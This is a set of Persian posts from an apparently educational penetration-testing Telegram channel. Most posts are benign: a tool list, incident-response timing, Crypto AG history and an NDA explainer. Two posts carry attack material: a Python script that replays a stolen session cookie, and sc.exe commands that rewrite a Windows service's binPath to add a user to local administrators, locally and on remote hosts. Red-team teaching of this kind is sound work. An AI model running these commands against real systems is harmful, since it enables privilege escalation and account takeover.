یک نمای کلی از نحوه انجام یک حمله Revival Hijack با استفاده از پایتون :
⭕ با این حال، لطفا توجه داشته باشید که این فقط برای اهداف آموزشی است و نباید برای فعالیت های مخرب استفاده شود.
⚠️ سلب مسئولیت: باید تاکید کنم که حملات Revival Hijack فعالیت های مخرب تلقی می شوند و نباید بدون اجازه و مجوز مناسب از صاحبان برنامه انجام شوند.
کد پایتون:
در اینجا مثالی از نحوه انجام یک حمله Revival Hijack با استفاده از پایتون با کتابخانه
توجه :
* این کد فقط برای اهداف آموزشی است و نباید برای فعالیت های مخرب استفاده شود.
* متغیر session_id باید با یک شناسه جلسه معتبر که از برنامه تارگت گرفته شده است جایگزین شود.
* متغیرهای headers و cookies باید برای مطابقت با نیازهای برنامه مورد نظر اصلاح شوند.
* این کد فرض میکند که برنامه تارگت از مکانیزم تولید شناسه جلسه ضعیف استفاده میکند و پس از خروج کاربر، جلسات را به درستی باطل نمیکند.
⭕⚠️ باز هم باید تاکید کنم که حملات Revival Hijack فعالیتهای مخرب تلقی میشوند و نباید بدون اجازه و مجوز مناسب از صاحبان برنامه انجام شوند.
⭕ مسئولیت استفاده غیر مجاز به عهده خود شخص می باشد ، ما هیچ مسئولیتی را بر عهده نمیگیریم
@TryHackBox
⭕ با این حال، لطفا توجه داشته باشید که این فقط برای اهداف آموزشی است و نباید برای فعالیت های مخرب استفاده شود.
⚠️ سلب مسئولیت: باید تاکید کنم که حملات Revival Hijack فعالیت های مخرب تلقی می شوند و نباید بدون اجازه و مجوز مناسب از صاحبان برنامه انجام شوند.
کد پایتون:
در اینجا مثالی از نحوه انجام یک حمله Revival Hijack با استفاده از پایتون با کتابخانه
requests آورده شده است:import requests
# Define the target application's URL and session ID
url = "https://example.com/login"
session_id = " WeakSessionID123"
# Define the headers and cookies for the request
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.8",
"Accept-Encoding": "gzip, deflate, br"
}
cookies = {
"session_id": session_id
}
# Send a request to the application with the stolen session ID
response = requests.get(url, headers=headers, cookies=cookies)
# Check if the response indicates a successful session hijack
if response.status_code == 200:
print("Session hijack successful!")
# You can now perform actions on the application as the hijacked user
else:
print("Session hijack failed.")
توجه :
* این کد فقط برای اهداف آموزشی است و نباید برای فعالیت های مخرب استفاده شود.
* متغیر session_id باید با یک شناسه جلسه معتبر که از برنامه تارگت گرفته شده است جایگزین شود.
* متغیرهای headers و cookies باید برای مطابقت با نیازهای برنامه مورد نظر اصلاح شوند.
* این کد فرض میکند که برنامه تارگت از مکانیزم تولید شناسه جلسه ضعیف استفاده میکند و پس از خروج کاربر، جلسات را به درستی باطل نمیکند.
⭕⚠️ باز هم باید تاکید کنم که حملات Revival Hijack فعالیتهای مخرب تلقی میشوند و نباید بدون اجازه و مجوز مناسب از صاحبان برنامه انجام شوند.
⭕ مسئولیت استفاده غیر مجاز به عهده خود شخص می باشد ، ما هیچ مسئولیتی را بر عهده نمیگیریم
@TryHackBox
👍3
Forwarded from Try Hack Box
معرفی 10 بهترین #ابزار رایگان تست نفوذ وب 2022
ابزار zed attack proxy
کار عملی با ابزار zed attack proxy
ابزار w3af
کار عملی با w3af
ابزار arachni
کار عملی با arachni
ابزار wapiti
کار عملی با wapiti
ابزار Metasploit
ابزار vega
کار عملی با vega
ابزار Grabber
ابزار sqlmap
کار عملی با sqlmap
ابزار ratproxy
ابزار wfuzz
کار عملی با wfuzz
این پست و برای دوستانت که تشت نفوذ وب کار میکنند یا علاقه دارند بفرست
#tools
@TryHackBox
ابزار zed attack proxy
کار عملی با ابزار zed attack proxy
ابزار w3af
کار عملی با w3af
ابزار arachni
کار عملی با arachni
ابزار wapiti
کار عملی با wapiti
ابزار Metasploit
ابزار vega
کار عملی با vega
ابزار Grabber
ابزار sqlmap
کار عملی با sqlmap
ابزار ratproxy
ابزار wfuzz
کار عملی با wfuzz
این پست و برای دوستانت که تشت نفوذ وب کار میکنند یا علاقه دارند بفرست
#tools
@TryHackBox
👍3❤1
قانون ۶۰-۱۰-۱ چیست ؟ یعنی سازمانها باید بتوانند زیر یک دقیقه نفوذ را شناسایی کنند، ریسکهای آن را تا ۱۰ دقیقه ارزیابی نمایند و تا کمتر از یک ساعت مهاجم را بیرون کنند.
@TryHackBox
@TryHackBox
👍6
قانون ۶۰-۱۰-۱ شامل تشخیص نفوذ طی ۱ دقیقه، بررسی و انجام تحقیقات طی ۱۰ دقیقه، و قرنطینه و رفع مساله طی ۶۰ دقیقه است. هر چه یک نفوذگر فرصت بیشتری برای انجام حرکت جانبی در زمان حضور در سیستم در اختیار داشته باشد احتمال ایکه حمله موفقیتآمیز باشد، افزایش مییابد.
@TryHackBox
@TryHackBox
🔥3
Forwarded from TryHackBox Story
📌رمزگشایی تاریک بخش دوم: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت
طبق گزارشهایی که در حال حاضر از حالت طبقهبندی خارج شده است، فریدمن در سالهای 1955 تا 1969 بارها با هاگلین دیدار کرده است. در این گزارش، جزئیات مکالمات این دو مرد شرح داده شده است. در این گزارشها آمده است که هاگلین علاوه بر اینکه قصد داشت تولید Crypto AG را افزایش دهد، همچنین میخواست مدل دوم این دستگاه را عرضه کند. هاگلین به فریدمن مواردی همچون پیشرفتهتر بودن مدل دوم Crypto AG نسبت به مدل اول را گفت و همچنین اظهار داشت که مدل دوم دارای تکنولوژی پیشرفتهتری است. در نهایت، قرار بر این شد که هاگلین مدل جدید را قبل از عرضه به بازار جهت بررسی به دولت ایالات متحده دهد. شایان ذکر است داشتن این دستگاه به تنهایی به ایالات متحده یک برتری تکنولوژیکی میداد، زیرا این فناوری در آن زمان بسیار پیشرفته بود.
همکاری و تبادل اطلاعات میان هاگلین و فریدمن فراتر از ارائه یک دستگاه جدید رمزنگاری بود. آنها درباره مشتریان بالقوه Crypto AG از جمله سازمانهای دولتی ایتالیا، مصر، اردن، عراق و عربستان بحث میکردند. شایان ذکر است در آن زمان بیش از 30 کشور متقاضی خرید محصولات این شرکت بودند که هاگلین جزئیات تعاملات خود را با آن کشورها در اختیار فریدمن قرار میداد.
علاوه بر اینکه هاگلین نسخههایی از مکاتبات حساس با مشتریان بالقوه را به دولت ارائه میداد، بلکه استفاده مورد نظر مشتریان و نگرانیهای مطرح شده از سوی آنها را نیز به آمریکا ارائه میداد. بهعنوان مثال، هاگلین جزئیات تعاملات خود را که شامل برنامههایی برای بهبود در امور رمزنگاری با مقامات دولتی مرتبط با Patrick Ollier بود، به دولت آمریکا ارائه داد. یکی دیگر از برنامههایی که هاگلین با مقامات دولتی فرانسه داشت، تأسیس یک کارخانه در پاریس همراه با تجهیزات و ابزارهای لازم برای توسعه سختافزار دستگاههای مخفی بود. شایان ذکر است که رمزنگاری و اجزای درونی ماشین همگی از شرکت Crypto AG تأمین میشدند و فرانسه از طراحیها، تجهیزات و کارشناسان این شرکت سوئیسی بهره میبرد. شایان ذکر است که فرانسه و سایر کشورها نمیدانستند که هاگلین این جزئیات را با آمریکاییها به اشتراک گذاشته است.
طبق اسنادی که از طبقهبندی خارج شده، در یکی از جلساتی که بین فریدمن و هاگلین برگزار شده بود، فریدمن پیشنهاد مهمی به هاگلین داد که متأسفانه ایالات متحده این بخش از گزارش را محرمانه کرده است. با این حال، یکسری بخشها درون اسناد نوشته شده بود که Crypto AG از این پس نسخههایی از تمامی مکاتبات مشتریان و سفارشهای آنان را به ایالات متحده ارائه خواهد کرد.
واشنگتن پست در سال 2020 بر اساس تحقیقات خود و اطلاعات موجود در گزارشهایی که از طبقهبندی خارج شدهاند، مقالهای منتشر کرد که در آن توضیح میداد پیشنهاد فریدمن به هاگلین چه بوده که به شرح ذیل است:
هاگلین، بنیانگذار و مالک Crypto AG، و ویلیام فریدمن، پدر رمزنگاری آمریکا، در اوایل دهه 1950 سیستمی راهاندازی کردند که به NSA این امکان را میداد تا شرکت Crypto AG تصمیم بگیرد که دستگاههای ارتباطی قابل شکستن یا ناامن را به کجا بفروشد و دستگاههای ارتباطی غیرقابل شکستن یا امن را به کجا.
با توجه به این فکتها، میتوان گفت این اولین حمله زنجیره تأمین یا supply chain attack خواهد بود که در آن یک دولت به دسترسی پنهان مشابه یک بکدور دست یافته بود که به آن دولت این امکان را میداد که مکاتبات دولتهای خارجی را نظارت کند.
✍️ نویسنده میلاد کهساری الهادی و محمد مهدی انبارکی
#ایالات_متحده #رمزگشایی_تاریک
@TryHackBoxStory
طبق گزارشهایی که در حال حاضر از حالت طبقهبندی خارج شده است، فریدمن در سالهای 1955 تا 1969 بارها با هاگلین دیدار کرده است. در این گزارش، جزئیات مکالمات این دو مرد شرح داده شده است. در این گزارشها آمده است که هاگلین علاوه بر اینکه قصد داشت تولید Crypto AG را افزایش دهد، همچنین میخواست مدل دوم این دستگاه را عرضه کند. هاگلین به فریدمن مواردی همچون پیشرفتهتر بودن مدل دوم Crypto AG نسبت به مدل اول را گفت و همچنین اظهار داشت که مدل دوم دارای تکنولوژی پیشرفتهتری است. در نهایت، قرار بر این شد که هاگلین مدل جدید را قبل از عرضه به بازار جهت بررسی به دولت ایالات متحده دهد. شایان ذکر است داشتن این دستگاه به تنهایی به ایالات متحده یک برتری تکنولوژیکی میداد، زیرا این فناوری در آن زمان بسیار پیشرفته بود.
همکاری و تبادل اطلاعات میان هاگلین و فریدمن فراتر از ارائه یک دستگاه جدید رمزنگاری بود. آنها درباره مشتریان بالقوه Crypto AG از جمله سازمانهای دولتی ایتالیا، مصر، اردن، عراق و عربستان بحث میکردند. شایان ذکر است در آن زمان بیش از 30 کشور متقاضی خرید محصولات این شرکت بودند که هاگلین جزئیات تعاملات خود را با آن کشورها در اختیار فریدمن قرار میداد.
علاوه بر اینکه هاگلین نسخههایی از مکاتبات حساس با مشتریان بالقوه را به دولت ارائه میداد، بلکه استفاده مورد نظر مشتریان و نگرانیهای مطرح شده از سوی آنها را نیز به آمریکا ارائه میداد. بهعنوان مثال، هاگلین جزئیات تعاملات خود را که شامل برنامههایی برای بهبود در امور رمزنگاری با مقامات دولتی مرتبط با Patrick Ollier بود، به دولت آمریکا ارائه داد. یکی دیگر از برنامههایی که هاگلین با مقامات دولتی فرانسه داشت، تأسیس یک کارخانه در پاریس همراه با تجهیزات و ابزارهای لازم برای توسعه سختافزار دستگاههای مخفی بود. شایان ذکر است که رمزنگاری و اجزای درونی ماشین همگی از شرکت Crypto AG تأمین میشدند و فرانسه از طراحیها، تجهیزات و کارشناسان این شرکت سوئیسی بهره میبرد. شایان ذکر است که فرانسه و سایر کشورها نمیدانستند که هاگلین این جزئیات را با آمریکاییها به اشتراک گذاشته است.
طبق اسنادی که از طبقهبندی خارج شده، در یکی از جلساتی که بین فریدمن و هاگلین برگزار شده بود، فریدمن پیشنهاد مهمی به هاگلین داد که متأسفانه ایالات متحده این بخش از گزارش را محرمانه کرده است. با این حال، یکسری بخشها درون اسناد نوشته شده بود که Crypto AG از این پس نسخههایی از تمامی مکاتبات مشتریان و سفارشهای آنان را به ایالات متحده ارائه خواهد کرد.
واشنگتن پست در سال 2020 بر اساس تحقیقات خود و اطلاعات موجود در گزارشهایی که از طبقهبندی خارج شدهاند، مقالهای منتشر کرد که در آن توضیح میداد پیشنهاد فریدمن به هاگلین چه بوده که به شرح ذیل است:
هاگلین، بنیانگذار و مالک Crypto AG، و ویلیام فریدمن، پدر رمزنگاری آمریکا، در اوایل دهه 1950 سیستمی راهاندازی کردند که به NSA این امکان را میداد تا شرکت Crypto AG تصمیم بگیرد که دستگاههای ارتباطی قابل شکستن یا ناامن را به کجا بفروشد و دستگاههای ارتباطی غیرقابل شکستن یا امن را به کجا.
با توجه به این فکتها، میتوان گفت این اولین حمله زنجیره تأمین یا supply chain attack خواهد بود که در آن یک دولت به دسترسی پنهان مشابه یک بکدور دست یافته بود که به آن دولت این امکان را میداد که مکاتبات دولتهای خارجی را نظارت کند.
✍️ نویسنده میلاد کهساری الهادی و محمد مهدی انبارکی
#ایالات_متحده #رمزگشایی_تاریک
@TryHackBoxStory
👍2
دوستان فصل جدیدی از کانال ما شروع خواهد شد .
موضوع کانال : یاددادن تست نفوذ وب و شبکه درحال حاضر خواهد بود !
آموزش های ما :
پست های قبل رو میخواستم پاک کنم ولی گفتم ممکنه لازم باشه و نگه میدارمشون که استفاده کنید حال موضوع ما مشخص شده است و طبق همین جلو میریم .
ما رو به دوستانتون معرفی کنید .
@TryHackBox
موضوع کانال : یاددادن تست نفوذ وب و شبکه درحال حاضر خواهد بود !
آموزش های ما :
آموزش تست نفوذ وب و شبکه و SOC را خواهیم داشت .
آموزش مقدماتی تست نفوذ رایگان .
و آموزش هایی از سایت TryHackMe و HackTheBox .
آموزش مهندسی اجتماعی و Osint را هم خواهیم داشت .
آموزش و مقالات مرتبط با Red Team .
آموزش زبان های برنامه نویسی برای تست نفوذ .
پست های قبل رو میخواستم پاک کنم ولی گفتم ممکنه لازم باشه و نگه میدارمشون که استفاده کنید حال موضوع ما مشخص شده است و طبق همین جلو میریم .
ما رو به دوستانتون معرفی کنید .
@TryHackBox
👍11🔥5
NDA چیست ؟
قرارداد عدم افشا (NDA) یا Non-Disclosure Agreement، یک توافقنامه قانونی است که بین دو یا چند طرف منعقد میشود تا اطلاعات محرمانه و حساس که در خلال تعاملات تجاری یا همکاریها به اشتراک گذاشته میشود، محفوظ بماند. این قرارداد به طرفین این امکان را میدهد که بدون نگرانی از افشای اطلاعات حساس، همکاری کنند.
ویژگیهای اصلی NDA:
1. تعریف اطلاعات محرمانه: NDA مشخص میکند که کدام اطلاعات به عنوان محرمانه تلقی میشود.
2. تعهد عدم افشا: طرفین متعهد میشوند که اطلاعات محرمانه را به شخص ثالث افشا نکنند.
3. مدت زمان اعتبار: NDA معمولاً مدت زمانی را برای اعتبار خود تعیین میکند که در آن اطلاعات باید محرمانه باقی بماند.
4. استثنائات: ممکن است شرایطی وجود داشته باشد که در آن افشای اطلاعات مجاز است، مانند موارد قانونی یا اطلاعاتی که قبلاً عمومی شدهاند.
5. پیامدهای نقض: در صورت نقض قرارداد، عواقب قانونی و مالی برای طرف متخلف مشخص میشود.
NDAها معمولاً در زمینههای تجاری، فناوری، تحقیق و توسعه و سایر حوزههایی که اطلاعات حساس وجود دارد، استفاده میشوند.
دو نکته حساس و کلیدی باید در کلیه قراردادهای NDA درج شود:
تعریف اطلاعات محرمانه
باید به دقت تعریف شود که اطلاعات محرمانه چیست و چه اطلاعاتی نباید افشا شود. در صورتی که تعریف دقیقی از اطلاعات محرمانه در قرارداد ارائه نشود، پیمان عدم افشا عملکرد ضعیفی خواهد داشت.
مشخص کردن طرفین قرارداد:
علاوه بر ارائه تعریف دقیق از اطلاعات محرمانه باید طرفین قرارداد و کلیه اشخاص و ذینفعان تعریف و مشخص شوند. برای مثال باید مشخص شود که اگر یکی از طرفین یک شخص حقوقی است آیا مسولیتی متوجه اعضا و افراد آن شرکت یا سازمان نیز هست یا خیر.
ایا سخنی برای اضافه کردند دارید ؟
#NDA
#قرارداد
@TryHackBox
قرارداد عدم افشا (NDA) یا Non-Disclosure Agreement، یک توافقنامه قانونی است که بین دو یا چند طرف منعقد میشود تا اطلاعات محرمانه و حساس که در خلال تعاملات تجاری یا همکاریها به اشتراک گذاشته میشود، محفوظ بماند. این قرارداد به طرفین این امکان را میدهد که بدون نگرانی از افشای اطلاعات حساس، همکاری کنند.
ویژگیهای اصلی NDA:
1. تعریف اطلاعات محرمانه: NDA مشخص میکند که کدام اطلاعات به عنوان محرمانه تلقی میشود.
2. تعهد عدم افشا: طرفین متعهد میشوند که اطلاعات محرمانه را به شخص ثالث افشا نکنند.
3. مدت زمان اعتبار: NDA معمولاً مدت زمانی را برای اعتبار خود تعیین میکند که در آن اطلاعات باید محرمانه باقی بماند.
4. استثنائات: ممکن است شرایطی وجود داشته باشد که در آن افشای اطلاعات مجاز است، مانند موارد قانونی یا اطلاعاتی که قبلاً عمومی شدهاند.
5. پیامدهای نقض: در صورت نقض قرارداد، عواقب قانونی و مالی برای طرف متخلف مشخص میشود.
NDAها معمولاً در زمینههای تجاری، فناوری، تحقیق و توسعه و سایر حوزههایی که اطلاعات حساس وجود دارد، استفاده میشوند.
دو نکته حساس و کلیدی باید در کلیه قراردادهای NDA درج شود:
تعریف اطلاعات محرمانه
باید به دقت تعریف شود که اطلاعات محرمانه چیست و چه اطلاعاتی نباید افشا شود. در صورتی که تعریف دقیقی از اطلاعات محرمانه در قرارداد ارائه نشود، پیمان عدم افشا عملکرد ضعیفی خواهد داشت.
مشخص کردن طرفین قرارداد:
علاوه بر ارائه تعریف دقیق از اطلاعات محرمانه باید طرفین قرارداد و کلیه اشخاص و ذینفعان تعریف و مشخص شوند. برای مثال باید مشخص شود که اگر یکی از طرفین یک شخص حقوقی است آیا مسولیتی متوجه اعضا و افراد آن شرکت یا سازمان نیز هست یا خیر.
ایا سخنی برای اضافه کردند دارید ؟
#NDA
#قرارداد
@TryHackBox
👍9
مسابقه ای که شاپرک برگزار کرد واقعا کلی ایراد داشت و راحت میشد فلگ ها را با سرچ زدن پیدا کرد واقعا از لحاظ فنی صفر هستند .
یک مشت کپی پیست کار اسم خودشون گذاشتند امنیت کار !
یک مشت کپی پیست کار اسم خودشون گذاشتند امنیت کار !
👍20
Printer Hacking 101.pdf
1.7 MB
Printer Hacking 101
با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox
با هک چاپگر آشنا شوید و با آن آشنا شوید و اصول اولیه IPP را بدانید.
#PrinterHacking
@TryHackBox
👍8👎1
Hacking with PowerShell @TryHackBox.pdf
1 MB
Hacking with PowerShell
اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox
اصول اولیه PowerShell و PowerShell Scripting را بیاموزید.
#powershell
@TryHackBox
❤5
پیکربندی ناامن ACL های سرویس از طریق group policies
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
اگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
سرویس را شروع کنید:
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
سیاست های گروه ابزار محبوبی برای مدیریت متمرکز زیرساخت های مبتنی بر Active Directory هستند. ابزار Group3r به شما امکان می دهد اطلاعاتی را از سیاست های گروه برای تجزیه و تحلیل بعدی جمع آوری کنید. Group3r همچنین برخی از تنظیمات نادرست را برجسته می کند، بنابراین جستجو با استفاده از کلمات کلیدی red و black برای شناسایی مهم ترین نقص ها راحت است. پست امروز درباره پیکربندی ناامن ACL های سرویس از طریق گروپ پالیسی است.
پس از راه اندازی Group3r و بررسی نتایج، خطوط زیر را یافتیم:
A Windows service's ACL is being configured to grant abusable permissions to a target trustee. This should allow local privilege escalation on affected hosts. Service: wuauserv, Trustee: Authenticated Users - S-1-5-11 .
اگر به خود Group Policy بروید، نام سرویس، نوع راه اندازی و تنظیمات حقوق دسترسی را در قالب یک رشته SSDL پیدا می کنیم:
"wuauserv",4,"D:AR(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)(A;;CCLCSWLOCRRC;;;IU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
ما فقط به گروه AU علاقه مندیم:
- CC -
حقوق درخواست پیکربندی سرویس.
- DC -
حقوق تغییر سرویس.
- LC -
حقوق درخواست وضعیت سرویس ها؛
- SW -
حقوق فهرست کردن تمام خدمات وابسته به سرویس
- RP - حقوق شروع سرویس؛
- WP - حقوق توقف سرویس؛
- DT - حقوق توقف سرویس.
- LO – حقوقی که به شما امکان می دهد از سرویس بخواهید فورا وضعیت شما را گزارش کند.
- CR - حقوق تعیین کد کاربر عنصر کنترل.
- RC - حقوق خواندن توصیفگرهای امنیتی.
ابتدا باید تعیین کنید که این خط مشی گروه روی کدام کامپیوترها اعمال می شود.
MATCH(g:GPO {name:"VULNSERVICE@DOMAIN.LOCAL"})-[:GPLink|Contains*1..]->(c:Computer) RETURN c.nameاگر میزبان فعلی ما یا میزبانی که به آن دسترسی راه دور داریم این خط مشی را اعمال می کند، پیکربندی سرویس فعلی را در رایانه محلی پرس و جو می کنیم:
sc.exe qc wuauserv
ما مقدار فعلی پارامتر BINARY_PATH_NAME را برای بازیابی بعدی ذخیره می کنیم.
ما پارامتر BINARY_PATH_NAME را به کاری که میخواهیم در رایانه انجام دهیم تغییر میدهیم، برای مثال، خود را به گروه مدیران لوکال یا local administrators اضافه میکنیم.
sc.exe config wuauserv binPath= "net.exe localgroup administrators victim /add"
سرویس را شروع کنید:
sc.exe start wuauserv
اگر سرویس راه اندازی شده است، ابتدا باید آن را متوقف کنید و سپس آن را شروع کنید:
sc.exe stop wuauserv
sc.exe start wuauserv
در حالی که Group3r گزارش می دهد که این نقص می تواند برای افزایش دسترسی لوکال استفاده شود، در برخی موارد می توان از آن برای افزایش دسترسی از راه دور و lateral movement نیز استفاده کرد.
ما یک بررسی ساده انجام می دهیم، مانند راه اندازی یا نصب یک سرویس در یک میزبان راه دور:
sc.exe \\server start wuauserv
اگر خطای Access Denied ظاهر نشد، بیایید سعی کنیم خود را به گروه مدیران لوکال اضافه کنیم و سرویس را راه اندازی کنیم:
sc.exe \\server config wuauserv binPath= "net.exe localgroup administrators victim /add"
sc.exe \\server start wuauserv
پس از به دست آوردن دسترسی local administrator، پارامتر BINARY_PATH_NAME را به حالت اولیه خود برگردانید.
#RedTeam #PurpleTeam #LPE
@TryHackBox
👍5🔥3
Media is too big
VIEW IN TELEGRAM
Pro's vs. Joes
چگونه یک لابراتور برای خودمون بسازیم
#Lab
@TryHackBox
@Home Edition Presents: "Building A Monster Lab" w/ Jeff McJunkinچگونه یک لابراتور برای خودمون بسازیم
#Lab
@TryHackBox
👍8
دوستان به زودی فعالیتمون در یوتیوب شروع میشه خوشحال میشم حمایتمون کنید به زودی ...
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست
فعالیتمون در یوتیوب مباحث تست نفوذ شبکه هست
👌19👍3
هنری که با خرد همراه نباشد، همچو مرگی که است که بر تن چیره گشته…
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox
«برگرفته از اندرزنامه پهلویِ دستور آذرباد ماراسپندان»
@TryHackBox
❤9